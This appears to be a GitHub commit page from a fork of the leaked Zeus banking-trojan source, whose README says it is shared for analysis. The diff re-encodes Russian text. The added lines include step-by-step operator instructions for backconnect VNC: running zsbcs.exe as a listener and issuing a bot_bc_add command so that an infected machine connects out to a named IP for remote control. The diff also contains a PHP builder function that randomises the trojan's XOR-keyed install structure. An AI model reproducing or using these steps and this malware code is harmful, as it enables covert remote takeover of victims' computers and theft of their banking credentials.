forked from zeustrojancode/Zeus
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Ubuntu
committed
Jun 28, 2013
1 parent
ba9b10a
commit 301d2c9
Showing
195 changed files
with
4,999 additions
and
4,999 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,4 @@ | ||
This is version 2.0.8.9 downloaded from | ||
http://www.mdl4.com/2011/05/download-zeus-source-code/ | ||
|
||
This repository doesn´t contain my code I have uploaded it to GitHub to simplify the process of getting/analysing the code. | ||
This repository doesnВґt contain my code I have uploaded it to GitHub to simplify the process of getting/analysing the code. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,11 +1,11 @@ | ||
��� �� ���������� ������: | ||
1. �������� ����� � ���������� IP | ||
2. �������������� �� ���� ���� zsbcs.exe | ||
3. ���������� ��������� ������ � ���������� ���� ���� �� ���������� �����������: zsbcs.exe listen -ipv4 -cp:1080 -bp:4500 | ||
-cp:1080 ��� ���� ������� ����������� �� ������ ��� ������ vnc viewer'� | ||
-bp:4500 ���� ����, ����� ������� ��� ����������� � ������. | ||
4. � ������� ������� ��� ������� ���� ��������� ������: bot_bc_add vnc 24.255.207.83 4500 | ||
(��� 24.255.207.83 IP ������) | ||
5. ����� ����� vnc viewer � ������ ��� IP ������ � ���� ��� ��������: 24.255.207.83:1080 | ||
���� ������� ����������� ���� � vnc viewer'� � ������ ������������ � ���� ��������� ������. ����� ���������� ������ �� �������� ��������� ���������� �������� Ctrl+C. | ||
6. ����������� ������� ��� bot_bc_remove vnc 24.255.207.83 4500 ����� �������� | ||
Там всё достаточно просто: | ||
1. Находишь дедик с выделенным IP | ||
2. Устанавливаешь на него файл zsbcs.exe | ||
3. Открываешь командную строку и запускаешь этот файл со следующими параметрами: zsbcs.exe listen -ipv4 -cp:1080 -bp:4500 | ||
-cp:1080 это порт который открывается на дедике для твоего vnc viewer'а | ||
-bp:4500 этот порт, через который бот коннектится к дедику. | ||
4. В админке создаёшь для нужного бота следующий скрипт: bot_bc_add vnc 24.255.207.83 4500 | ||
(где 24.255.207.83 IP дедика) | ||
5. Берёшь любой vnc viewer и пишешь там IP дедика и порт для коннекта: 24.255.207.83:1080 | ||
Весь процесс подключения бота и vnc viewer'а к дедику отображается в окне командной строки. После завершения работы не забывает разорвать соединение нажатием Ctrl+C. | ||
6. незабывайте удалить внц bot_bc_remove vnc 24.255.207.83 4500 таким скриптом |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,29 +1,29 @@ | ||
<?php | ||
/////////////////////////////////////////////////////////////////////////////////////////////////// | ||
// Ãåíåðàöèÿ ñòðóêòóðû INSTALLDATA. | ||
// Генерация структуры INSTALLDATA. | ||
/////////////////////////////////////////////////////////////////////////////////////////////////// | ||
|
||
/* | ||
Ãåíåðàöèÿ ñòðóêòóðû BASECONFIG. | ||
Генерация структуры BASECONFIG. | ||
Return - ñîäåðæèìîå h-ôàéëà. | ||
Return - содержимое h-файла. | ||
*/ | ||
function generateInstallData() | ||
{ | ||
$vars = array | ||
( | ||
"DWORD xorKey; //Êëþ÷ øèôðîâàíèÿ.", | ||
"DWORD installSize; //Ðàçìåð CoreInstall::_install().", | ||
"DWORD updateSize; //Ðàçìåð CoreInstall::_update()." | ||
"DWORD xorKey; //Ключ шифрования.", | ||
"DWORD installSize; //Размер CoreInstall::_install().", | ||
"DWORD updateSize; //Размер CoreInstall::_update()." | ||
); | ||
|
||
//Ïåðåìåøèâàåì çíà÷åíèÿ. | ||
//Перемешиваем значения. | ||
shuffle($vars); | ||
|
||
//Äîáîâëÿåì ïåðåä êàæäûì çíà÷åíèåì ñòðóêòóðû, ïðîèçâîëíûé áóôôåð. | ||
//Добовляем перед каждым значением структуры, произволный буффер. | ||
$outputStruct = implode("\r\n ", $vars); | ||
|
||
//Âûâîäèì. | ||
//Выводим. | ||
return "typedef struct\r\n{\r\n {$outputStruct}\r\n}INSTALLDATA;\r\n"; | ||
} | ||
?> |
Oops, something went wrong.